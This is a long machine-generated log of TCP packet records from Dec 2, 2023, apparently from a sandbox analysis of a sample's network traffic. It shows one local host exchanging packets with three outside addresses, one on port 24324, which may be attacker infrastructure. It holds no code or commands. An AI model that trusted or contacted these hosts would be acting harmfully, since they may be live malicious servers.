                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632839918 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632844925 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632852077 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632863998 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632875919 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632877111 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632888079 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632900000 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632900953 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632911921 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632919073 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632924080 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632936001 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632941961 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632949114 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.632971048 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.633002996 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.633059025 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.808479071 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.808491945 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.808501959 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.808512926 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.808631897 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.809029102 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.809102058 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.809123039 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.809134007 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.809144974 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.809171915 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.809281111 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.809292078 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.809314966 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.809325933 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.809334993 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.809345007 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.809354067 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.809746027 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.809881926 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.809892893 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.809901953 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.809912920 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.809923887 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.809933901 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.810203075 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.810319901 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.884849072 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.884871960 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.884886026 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.884897947 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.884910107 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.884922028 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.884934902 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.884947062 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.884958029 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.884969950 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.885066986 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.885148048 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.885160923 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.885173082 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.885185957 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.885196924 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.885240078 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.885240078 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.885240078 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.885535955 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.885549068 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.885560036 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.885590076 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.885611057 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:53.885853052 CET4972380192.168.2.6211.119.84.112
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.052066088 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.052175999 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.062246084 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.062258959 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.062268019 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.062278032 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.062287092 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.062357903 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.062406063 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.062416077 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.062520027 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.062652111 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.062660933 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.062722921 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.063787937 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.063877106 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.063886881 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.063913107 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.064032078 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.064188957 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.064198017 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.064198017 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.064308882 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.064317942 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.064327002 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.064358950 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.064387083 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.064410925 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.064595938 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.064615965 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.064677954 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.064739943 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.064838886 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.064847946 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.065102100 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.065216064 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.178631067 CET8049723211.119.84.112192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.277636051 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.294565916 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.318093061 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.318114996 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.318125963 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.318135977 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.318146944 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.318209887 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.318382978 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.318393946 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.318403959 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.318480968 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.318567991 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.318578959 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.318624020 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.318636894 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.318655968 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.318706989 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.318787098 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.318864107 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.318903923 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.318948030 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.319077015 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.319087982 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.319140911 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.319154024 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.319163084 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.319200039 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.319246054 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.319344997 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.319427967 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.319439888 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.319575071 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.319677114 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.319681883 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.319689035 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.319747925 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.319757938 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.319766998 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.319835901 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.319871902 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.319881916 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.320197105 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.320292950 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.386776924 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.573637962 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.573653936 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.573662996 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.573673010 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.573707104 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.573878050 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.573888063 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.574068069 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.574078083 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.574112892 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.574178934 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.574197054 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.574363947 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.574434042 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.574460983 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.574525118 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.574565887 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.574649096 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.574659109 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.574717045 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.574758053 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.574809074 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.574901104 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.574911118 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.575162888 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.575176954 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.575227022 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.575328112 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.575326920 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.575388908 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.575398922 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.575470924 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.575634003 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.575644016 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.575653076 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.575700998 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.575931072 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.576029062 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.829190969 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.829211950 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.829221964 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.829232931 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.829252005 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.829262972 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.829435110 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.829447985 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.829457045 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.829500914 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.829634905 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.829646111 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.829657078 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.829667091 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.829677105 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.829687119 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.829696894 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.829735994 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.829763889 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.829792976 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.829802990 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.829893112 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.829901934 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.829957008 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.830111980 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.830174923 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.830256939 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.830310106 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.830471039 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.831675053 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.831806898 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.831816912 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.831959009 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.832782030 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.832791090 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.832950115 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.833118916 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.833168030 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.833178043 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.833183050 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.833192110 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:54.833276987 CET4972224324192.168.2.6193.233.132.48
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:55.084042072 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:55.084059000 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:55.084068060 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:55.084073067 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:55.084140062 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:55.084156990 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:55.084300041 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:55.084445000 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:55.084455013 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:55.084503889 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:55.084647894 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:55.084656954 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:55.084748983 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:55.084820032 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:55.084868908 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:55.084878922 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:55.084953070 CET2432449722193.233.132.48192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:55.084963083 CET2432449722193.233.132.48192.168.2.6
